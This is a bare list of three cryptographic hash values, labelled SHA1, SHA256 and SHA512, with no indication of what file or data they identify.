SHA1164ace9df43f1a760c1205f82c9cc4eb1dfee991
SHA25630e97b3c23a562d5ea0b8605ded5a5b22529defc42c1a420dfbb3e42007910c8
SHA5129169eaab184c2412dc469cee331efca0b17ed4efa8ec791d1c3320b7914a2132dba76dccf7700cbe1084c2ab00e3e4bec277564bdb0a9f2e9739e559109bc534